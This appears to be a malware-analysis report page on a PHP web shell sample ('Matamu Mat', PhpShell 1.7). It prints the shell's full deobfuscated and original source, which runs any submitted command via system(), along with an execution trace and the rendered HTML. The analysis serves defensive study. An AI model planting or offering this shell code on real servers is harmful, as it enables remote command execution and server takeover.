shell.php.txt

md5: 1a95f0163b6dea771da1694de13a3d8d

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Execution
exec (Deobfuscated, Original)
system (Deobfuscated, Original)

Title
 Matamu Mat  (Deobfuscated, HTML, Original)

Deobfuscated PHP code
<?php

define('PHPSHELL_VERSION', '1.7');
?>

<html>
<head>
<title> Matamu Mat </title>
</head>
<body>
<hr><br>

<?php 
if (ini_get('register_globals') != '1') {
    /* We'll register the variables as globals: */
    if (!empty($HTTP_POST_VARS)) {
        extract($HTTP_POST_VARS);
    }
    if (!empty($HTTP_GET_VARS)) {
        extract($HTTP_GET_VARS);
    }
    if (!empty($HTTP_SERVER_VARS)) {
        extract($HTTP_SERVER_VARS);
    }
}
/* First we check if there has been asked for a working directory. */
if (!empty($work_dir)) {
    /* A workdir has been asked for */
    if (!empty($command)) {
        if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
            /* We try and match a cd command. */
            if ($regs[1][0] == '/') {
                $new_dir = $regs[1];
                // 'cd /something/...'
            } else {
                $new_dir = $work_dir . '/' . $regs[1];
                // 'cd somedir/...'
            }
            if (file_exists($new_dir) && is_dir($new_dir)) {
                $work_dir = $new_dir;
            }
            unset($command);
        }
    }
}
if (file_exists($work_dir) && is_dir($work_dir)) {
    /* We change directory to that dir: */
    chdir($work_dir);
}
/* We now update $work_dir to avoid things like '/foo/../bar': */
$work_dir = exec('pwd');
?>

<form name="myform" action="<?php 
echo $PHP_SELF;
?>" method="post">
<p>Current working directory: <b>
<?php 
$work_dir_splitted = explode('/', substr($work_dir, 1));
echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
if (!empty($work_dir_splitted[0])) {
    $path = '';
    for ($i = 0; $i < count($work_dir_splitted); $i++) {
        $path .= '/' . $work_dir_splitted[$i];
        printf('<a href="%s?work_dir=%s">%s</a>/', $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
    }
}
?></b></p>
<p>Choose new working directory:
<select name="work_dir" onChange="this.form.submit()">
<?php 
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
    if (is_dir($dir)) {
        if ($dir == '.') {
            echo "<option value=\"{$work_dir}\" selected>Current Directory</option>\n";
        } elseif ($dir == '..') {
            /* We have found the parent dir. We must be carefull if the parent 
            	 directory is the root directory (/). */
            if (strlen($work_dir) == 1) {
                /* work_dir is only 1 charecter - it can only be / There's no
                   parent directory then. */
            } elseif (strrpos($work_dir, '/') == 0) {
                echo "<option value=\"/\">Parent Directory</option>\n";
            } else {
                echo "<option value=\"" . strrev(substr(strstr(strrev($work_dir), "/"), 1)) . "\">Parent Directory</option>\n";
            }
        } else {
            if ($work_dir == '/') {
                echo "<option value=\"{$work_dir}{$dir}\">{$dir}</option>\n";
            } else {
                echo "<option value=\"{$work_dir}/{$dir}\">{$dir}</option>\n";
            }
        }
    }
}
closedir($dir_handle);
?>

</select></p>

<p>Command: <input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Execute Command"></p>

<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
<textarea cols="80" rows="20" readonly>

<?php 
if (!empty($command)) {
    if ($stderr) {
        $tmpfile = tempnam('/tmp', 'phpshell');
        $command .= " 1> {$tmpfile} 2>&1; " . "cat {$tmpfile}; rm {$tmpfile}";
    } else {
        if ($command == 'ls') {
            /* ls looks much better with ' -F', IMHO. */
            $command .= ' -F';
        }
    }
    system($command);
}
?>

</textarea>
</form>

<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>

<hr>

</body>
</html>
Execution traces
data/traces/1a95f0163b6dea771da1694de13a3d8d_trace-1676254933.0947.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:22:38.992520]
1	0	1	0.000178	393528
1	3	0	0.000332	411792	{main}	1		/var/www/html/uploads/shell.php.txt	0	0
2	4	0	0.000349	411792	define	0		/var/www/html/uploads/shell.php.txt	3	2	'PHPSHELL_VERSION'	'1.7'
2	4	1	0.000372	411896
2	4	R			TRUE
2	5	0	0.000389	411824	ini_get	0		/var/www/html/uploads/shell.php.txt	16	1	'register_globals'
2	5	1	0.000403	411856
2	5	R			FALSE
2	6	0	0.000434	411824	file_exists	0		/var/www/html/uploads/shell.php.txt	47	1	NULL
2	6	1	0.000448	411864
2	6	R			FALSE
2	7	0	0.000461	411824	exec	0		/var/www/html/uploads/shell.php.txt	53	1	'pwd'
2	7	1	0.001155	411904
2	7	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/shell.php.txt	53	$work_dir = '/var/www/html/uploads'
2	8	0	0.001207	411872	substr	0		/var/www/html/uploads/shell.php.txt	61	2	'/var/www/html/uploads'	1
2	8	1	0.001223	411984
2	8	R			'var/www/html/uploads'
2	9	0	0.001238	411920	explode	0		/var/www/html/uploads/shell.php.txt	61	2	'/'	'var/www/html/uploads'
2	9	1	0.001253	412496
2	9	R			[0 => 'var', 1 => 'www', 2 => 'html', 3 => 'uploads']
1		A						/var/www/html/uploads/shell.php.txt	61	$work_dir_splitted = [0 => 'var', 1 => 'www', 2 => 'html', 3 => 'uploads']
1		A						/var/www/html/uploads/shell.php.txt	66	$path = ''
1		A						/var/www/html/uploads/shell.php.txt	67	$i = 0
1		A						/var/www/html/uploads/shell.php.txt	68	$path .= '/var'
2	10	0	0.001330	412408	urlencode	0		/var/www/html/uploads/shell.php.txt	70	1	'/var'
2	10	1	0.001344	412472
2	10	R			'%2Fvar'
2	11	0	0.001357	412440	printf	0		/var/www/html/uploads/shell.php.txt	70	4	'<a href="%s?work_dir=%s">%s</a>/'	NULL	'%2Fvar'	'var'
2	11	1	0.001376	412504
2	11	R			35
1		A						/var/www/html/uploads/shell.php.txt	67	$i++
1		A						/var/www/html/uploads/shell.php.txt	68	$path .= '/www'
2	12	0	0.001413	412416	urlencode	0		/var/www/html/uploads/shell.php.txt	70	1	'/var/www'
2	12	1	0.001426	412488
2	12	R			'%2Fvar%2Fwww'
2	13	0	0.001440	412456	printf	0		/var/www/html/uploads/shell.php.txt	70	4	'<a href="%s?work_dir=%s">%s</a>/'	NULL	'%2Fvar%2Fwww'	'www'
2	13	1	0.001457	412520
2	13	R			41
1		A						/var/www/html/uploads/shell.php.txt	67	$i++
1		A						/var/www/html/uploads/shell.php.txt	68	$path .= '/html'
2	14	0	0.001493	412416	urlencode	0		/var/www/html/uploads/shell.php.txt	70	1	'/var/www/html'
2	14	1	0.001506	412496
2	14	R			'%2Fvar%2Fwww%2Fhtml'
2	15	0	0.001520	412464	printf	0		/var/www/html/uploads/shell.php.txt	70	4	'<a href="%s?work_dir=%s">%s</a>/'	NULL	'%2Fvar%2Fwww%2Fhtml'	'html'
2	15	1	0.001537	412528
2	15	R			49
1		A						/var/www/html/uploads/shell.php.txt	67	$i++
1		A						/var/www/html/uploads/shell.php.txt	68	$path .= '/uploads'
2	16	0	0.001573	412424	urlencode	0		/var/www/html/uploads/shell.php.txt	70	1	'/var/www/html/uploads'
2	16	1	0.001586	412512
2	16	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads'
2	17	0	0.001601	412480	printf	0		/var/www/html/uploads/shell.php.txt	70	4	'<a href="%s?work_dir=%s">%s</a>/'	NULL	'%2Fvar%2Fwww%2Fhtml%2Fuploads'	'uploads'
2	17	1	0.001619	412544
2	17	R			62
1		A						/var/www/html/uploads/shell.php.txt	67	$i++
2	18	0	0.001640	412424	opendir	0		/var/www/html/uploads/shell.php.txt	79	1	'/var/www/html/uploads'
2	18	1	0.001661	412816
2	18	R			resource(5) of type (stream)
1		A						/var/www/html/uploads/shell.php.txt	79	$dir_handle = resource(5) of type (stream)
2	19	0	0.001698	412784	readdir	0		/var/www/html/uploads/shell.php.txt	81	1	resource(5) of type (stream)
2	19	1	0.001719	412856
2	19	R			'..'
1		A						/var/www/html/uploads/shell.php.txt	81	$dir = '..'
2	20	0	0.001743	412816	is_dir	0		/var/www/html/uploads/shell.php.txt	82	1	'..'
2	20	1	0.001759	412864
2	20	R			TRUE
2	21	0	0.001791	412824	strrpos	0		/var/www/html/uploads/shell.php.txt	91	2	'/var/www/html/uploads'	'/'
2	21	1	0.001806	412896
2	21	R			13
2	22	0	0.001818	412824	strrev	0		/var/www/html/uploads/shell.php.txt	99	1	'/var/www/html/uploads'
2	22	1	0.001831	412904
2	22	R			'sdaolpu/lmth/www/rav/'
2	23	0	0.001845	412872	strstr	0		/var/www/html/uploads/shell.php.txt	99	2	'sdaolpu/lmth/www/rav/'	'/'
2	23	1	0.001864	412984
2	23	R			'/lmth/www/rav/'
2	24	0	0.001879	412864	substr	0		/var/www/html/uploads/shell.php.txt	99	2	'/lmth/www/rav/'	1
2	24	1	0.001892	412968
2	24	R			'lmth/www/rav/'
2	25	0	0.001905	412864	strrev	0		/var/www/html/uploads/shell.php.txt	99	1	'lmth/www/rav/'
2	25	1	0.001916	412936
2	25	R			'/var/www/html'
2	26	0	0.001930	412824	readdir	0		/var/www/html/uploads/shell.php.txt	81	1	resource(5) of type (stream)
2	26	1	0.001944	412896
2	26	R			'.'
1		A						/var/www/html/uploads/shell.php.txt	81	$dir = '.'
2	27	0	0.001967	412824	is_dir	0		/var/www/html/uploads/shell.php.txt	82	1	'.'
2	27	1	0.001981	412864
2	27	R			TRUE
2	28	0	0.001995	412824	readdir	0		/var/www/html/uploads/shell.php.txt	81	1	resource(5) of type (stream)
2	28	1	0.002008	412904
2	28	R			'prepend.php'
1		A						/var/www/html/uploads/shell.php.txt	81	$dir = 'prepend.php'
2	29	0	0.002032	412832	is_dir	0		/var/www/html/uploads/shell.php.txt	82	1	'prepend.php'
2	29	1	0.002046	412880
2	29	R			FALSE
2	30	0	0.002059	412840	readdir	0		/var/www/html/uploads/shell.php.txt	81	1	resource(5) of type (stream)
2	30	1	0.002072	412912
2	30	R			'data'
1		A						/var/www/html/uploads/shell.php.txt	81	$dir = 'data'
2	31	0	0.002094	412832	is_dir	0		/var/www/html/uploads/shell.php.txt	82	1	'data'
2	31	1	0.002108	412864
2	31	R			TRUE
2	32	0	0.002121	412824	readdir	0		/var/www/html/uploads/shell.php.txt	81	1	resource(5) of type (stream)
2	32	1	0.002134	412904
2	32	R			'shell.php.txt'
1		A						/var/www/html/uploads/shell.php.txt	81	$dir = 'shell.php.txt'
2	33	0	0.002158	412832	is_dir	0		/var/www/html/uploads/shell.php.txt	82	1	'shell.php.txt'
2	33	1	0.002171	412880
2	33	R			FALSE
2	34	0	0.002184	412840	readdir	0		/var/www/html/uploads/shell.php.txt	81	1	resource(5) of type (stream)
2	34	1	0.002197	412920
2	34	R			'.htaccess'
1		A						/var/www/html/uploads/shell.php.txt	81	$dir = '.htaccess'
2	35	0	0.002220	412840	is_dir	0		/var/www/html/uploads/shell.php.txt	82	1	'.htaccess'
2	35	1	0.002234	412880
2	35	R			FALSE
2	36	0	0.002246	412840	readdir	0		/var/www/html/uploads/shell.php.txt	81	1	resource(5) of type (stream)
2	36	1	0.002260	412880
2	36	R			FALSE
1		A						/var/www/html/uploads/shell.php.txt	81	$dir = FALSE
2	37	0	0.002282	412800	closedir	0		/var/www/html/uploads/shell.php.txt	110	1	resource(5) of type (stream)
2	37	1	0.002298	412616
2	37	R			NULL
1	3	1	0.002313	412576
			0.002347	315176
TRACE END   [2023-02-13 00:22:38.994725]

Generated HTML code
<html><head>
<title> Matamu Mat </title>
</head>
<body>
<hr><br>


<form name="myform" action="" method="post">
<p>Current working directory: <b>
<a href="?work_dir=/">Root</a>/<a href="?work_dir=%2Fvar">var</a>/<a href="?work_dir=%2Fvar%2Fwww">www</a>/<a href="?work_dir=%2Fvar%2Fwww%2Fhtml">html</a>/</b></p>
<p>Choose new working directory:
<select name="work_dir" onchange="this.form.submit()">
<option value="/var/www">Parent Directory</option>
<option value="/var/www/html" selected="">Current Directory</option>

</select></p>

<p>Command: <input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Execute Command"></p>

<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
<textarea cols="80" rows="20" readonly="">

</textarea>
</form>

<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>

<hr>



</body></html>
Original PHP code
<?php

define('PHPSHELL_VERSION', '1.7');

?>

<html>
<head>
<title> Matamu Mat </title>
</head>
<body>
<hr><br>

<?php

if (ini_get('register_globals') != '1') {
  /* We'll register the variables as globals: */
  if (!empty($HTTP_POST_VARS))
    extract($HTTP_POST_VARS);
  
  if (!empty($HTTP_GET_VARS))
    extract($HTTP_GET_VARS);

  if (!empty($HTTP_SERVER_VARS))
    extract($HTTP_SERVER_VARS);
}

/* First we check if there has been asked for a working directory. */
if (!empty($work_dir)) {
  /* A workdir has been asked for */
  if (!empty($command)) {
    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
      /* We try and match a cd command. */
      if ($regs[1][0] == '/') {
        $new_dir = $regs[1]; // 'cd /something/...'
      } else {
        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
      }
      if (file_exists($new_dir) && is_dir($new_dir)) {
        $work_dir = $new_dir;
      }
      unset($command);
    }
  }
}

if (file_exists($work_dir) && is_dir($work_dir)) {
  /* We change directory to that dir: */
  chdir($work_dir);
}

/* We now update $work_dir to avoid things like '/foo/../bar': */
$work_dir = exec('pwd');

?>

<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
<p>Current working directory: <b>
<?php

$work_dir_splitted = explode('/', substr($work_dir, 1));

echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';

if (!empty($work_dir_splitted[0])) {
  $path = '';
  for ($i = 0; $i < count($work_dir_splitted); $i++) {
    $path .= '/' . $work_dir_splitted[$i];
    printf('<a href="%s?work_dir=%s">%s</a>/',
           $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
  }
}

?></b></p>
<p>Choose new working directory:
<select name="work_dir" onChange="this.form.submit()">
<?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
  if (is_dir($dir)) {
    if ($dir == '.') {
      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
    } elseif ($dir == '..') {
      /* We have found the parent dir. We must be carefull if the parent 
	 directory is the root directory (/). */
      if (strlen($work_dir) == 1) {
	/* work_dir is only 1 charecter - it can only be / There's no
          parent directory then. */
      } elseif (strrpos($work_dir, '/') == 0) {
	/* The last / in work_dir were the first charecter.
	   This means that we have a top-level directory
	   eg. /bin or /home etc... */
      echo "<option value=\"/\">Parent Directory</option>\n";
      } else {
      /* We do a little bit of string-manipulation to find the parent
	 directory... Trust me - it works :-) */
      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
      }
    } else {
      if ($work_dir == '/') {
	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
      } else {
	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
      }
    }
  }
}
closedir($dir_handle);

?>

</select></p>

<p>Command: <input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Execute Command"></p>

<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
<textarea cols="80" rows="20" readonly>

<?php
if (!empty($command)) {
  if ($stderr) {
    $tmpfile = tempnam('/tmp', 'phpshell');
    $command .= " 1> $tmpfile 2>&1; " .
    "cat $tmpfile; rm $tmpfile";
  } else if ($command == 'ls') {
    /* ls looks much better with ' -F', IMHO. */
    $command .= ' -F';
  }
  system($command);
}
?>

</textarea>
</form>

<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>

<hr>

</body>
</html>
PHP Malware Analysis

shell.php.txt

md5: 1a95f0163b6dea771da1694de13a3d8d

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
